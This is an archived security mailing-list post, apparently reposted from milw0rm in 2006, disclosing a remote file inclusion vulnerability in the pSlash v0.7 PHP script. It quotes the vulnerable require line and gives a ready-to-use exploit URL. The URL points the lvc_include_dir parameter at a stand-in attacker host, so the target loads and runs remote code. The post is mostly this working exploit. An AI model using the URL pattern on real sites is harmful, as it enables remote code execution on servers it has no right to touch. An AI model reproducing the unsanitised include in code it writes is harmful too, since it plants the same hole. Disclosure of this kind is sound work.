pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

Subject: pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability
Date: 24 Aug 2006 05:30:08 -0000
From: suppressed

############################################################

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

suppressed: x0r0n[at]hotmail[dot]com

############################################################

#Code:  require($lvc_include_dir.'db/db_mysql.inc.php');

############################################################

#Exploit:
http://www.site.com/[path]/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, sakkkure

############################################################

# milw0rm.com [2006-08-23]

Prev by Date: [ MDKSA-2006:148 ] - Updated xorg-x11 packages fix vulnerabilities
Next by Date: Advisory 05/2006: Zend Platform Multiple Remote Vulnerabilities
Previous by thread: [ MDKSA-2006:148 ] - Updated xorg-x11 packages fix vulnerabilities
Next by thread: Advisory 05/2006: Zend Platform Multiple Remote Vulnerabilities
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.